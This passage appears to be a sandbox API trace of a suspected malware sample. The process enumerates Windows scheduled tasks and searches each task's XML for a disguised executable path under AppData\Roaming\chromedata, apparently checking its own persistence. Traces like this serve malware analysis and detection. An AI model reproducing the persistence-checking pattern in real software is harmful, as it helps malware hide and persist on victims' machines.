EventID=1801]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{190BA3F6-0205-4f46-B589-95C6822899D2}</ClassId>\r\n      <Data><![CDATA[PageNotZero]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.597] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\memdiag.dll,-230)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\memdiag.dll,-231)</Source>\r\n    <URI>\\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\system32\\memdiag.dll,-232)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <EventTrigger id=\"9ab90857-0ac9-49d3-845f-c235144fb537\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Application Popup'] and EventID=1801]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{190BA3F6-0205-4f46-B589-95C6822899D2}</ClassId>\r\n      <Data><![CDATA[PageNotZero]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.598] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.598] IRegisteredTaskCollection:get_Item (in: This=0x55fed8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.598] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="DecompressionFailureDetector") returned 0x0
	[0073.598] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\memdiag.dll,-230)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\memdiag.dll,-231)</Source>\r\n    <URI>\\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\system32\\memdiag.dll,-232)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <EventTrigger id=\"9DC9BDAA-AA47-4bca-8848-B96A2A5E0197\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"&gt;&lt;Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"&gt;*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{190BA3F6-0205-4f46-B589-95C6822899D2}</ClassId>\r\n      <Data><![CDATA[Decompression]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.599] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\memdiag.dll,-230)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\memdiag.dll,-231)</Source>\r\n    <URI>\\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\system32\\memdiag.dll,-232)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <EventTrigger id=\"9DC9BDAA-AA47-4bca-8848-B96A2A5E0197\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"&gt;&lt;Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"&gt;*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{190BA3F6-0205-4f46-B589-95C6822899D2}</ClassId>\r\n      <Data><![CDATA[Decompression]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.599] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.599] IUnknown:Release (This=0x55fed8) returned 0x0
	[0073.599] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fed8) returned 0x0
	[0073.600] ITaskFolderCollection:get_Count (in: This=0x55fed8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.600] IUnknown:Release (This=0x55fed8) returned 0x0
	[0073.600] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.600] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xf, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.600] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec8) returned 0x0
	[0073.600] IRegisteredTaskCollection:get_Count (in: This=0x55fec8, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.600] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.600] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="HotStart") returned 0x0
	[0073.600] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)</Author>\r\n    <URI>Microsoft\\Windows\\MobilePC\\HotStart</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{06DA0625-9701-43da-BFD7-FBEEA2180A1E}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.602] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)</Author>\r\n    <URI>Microsoft\\Windows\\MobilePC\\HotStart</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{06DA0625-9701-43da-BFD7-FBEEA2180A1E}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.602] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.602] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.602] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec8) returned 0x0
	[0073.602] ITaskFolderCollection:get_Count (in: This=0x55fec8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.602] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.602] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.602] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x10, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.602] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec0) returned 0x0
	[0073.603] IRegisteredTaskCollection:get_Count (in: This=0x55fec0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.603] IRegisteredTaskCollection:get_Item (in: This=0x55fec0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff98) returned 0x0
	[0073.603] IRegisteredTask:get_Name (in: This=0x55ff98, pName=0x128e3c | out: pName=0x128e3c*="LPRemove") returned 0x0
	[0073.603] IRegisteredTask:get_Xml (in: This=0x55ff98, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemRoot%\\System32\\lpremove.exe,-100)</Author>\r\n    <Source>$(@%systemRoot%\\System32\\lpremove.exe,-100)</Source>\r\n    <Description>$(@%systemRoot%\\System32\\lpremove.exe,-101)</Description>\r\n    <URI>Microsoft\\Windows\\MUI\\LPRemove</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger id=\"BootTrigger\">\r\n      <Delay>PT25M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT9H</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\lpremove.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.604] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemRoot%\\System32\\lpremove.exe,-100)</Author>\r\n    <Source>$(@%systemRoot%\\System32\\lpremove.exe,-100)</Source>\r\n    <Description>$(@%systemRoot%\\System32\\lpremove.exe,-101)</Description>\r\n    <URI>Microsoft\\Windows\\MUI\\LPRemove</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger id=\"BootTrigger\">\r\n      <Delay>PT25M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT9H</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\lpremove.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.604] IUnknown:Release (This=0x55ff98) returned 0x0
	[0073.604] IUnknown:Release (This=0x55fec0) returned 0x0
	[0073.604] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec0) returned 0x0
	[0073.604] ITaskFolderCollection:get_Count (in: This=0x55fec0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.604] IUnknown:Release (This=0x55fec0) returned 0x0
	[0073.605] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.605] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x11, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.605] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fed0) returned 0x0
	[0073.605] IRegisteredTaskCollection:get_Count (in: This=0x55fed0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.605] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.605] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="SystemSoundsService") returned 0x0
	[0073.605] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2005-06-23T13:48:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)</Description>\r\n    <URI>Microsoft\\Windows\\Multimedia\\SystemSoundsService</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)</SecurityDescriptor>\r\n    <Source>$(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)</Source>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger />\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{2DEA658F-54C1-4227-AF9B-260AB5FC3543}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.606] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2005-06-23T13:48:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)</Description>\r\n    <URI>Microsoft\\Windows\\Multimedia\\SystemSoundsService</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)</SecurityDescriptor>\r\n    <Source>$(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)</Source>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger />\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{2DEA658F-54C1-4227-AF9B-260AB5FC3543}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.607] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.607] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.607] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fed0) returned 0x0
	[0073.607] ITaskFolderCollection:get_Count (in: This=0x55fed0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.607] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.607] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.607] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x12, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.607] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec8) returned 0x0
	[0073.607] IRegisteredTaskCollection:get_Count (in: This=0x55fec8, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.607] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.607] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="GatherNetworkInfo") returned 0x0
	[0073.607] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\nettrace.dll,-6910)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\nettrace.dll,-6911)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\nettrace.dll,-6912)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers />\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AnyUser\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AnyUser\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\gatherNetworkInfo.vbs</Command>\r\n      <WorkingDirectory>$(Arg1)</WorkingDirectory>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
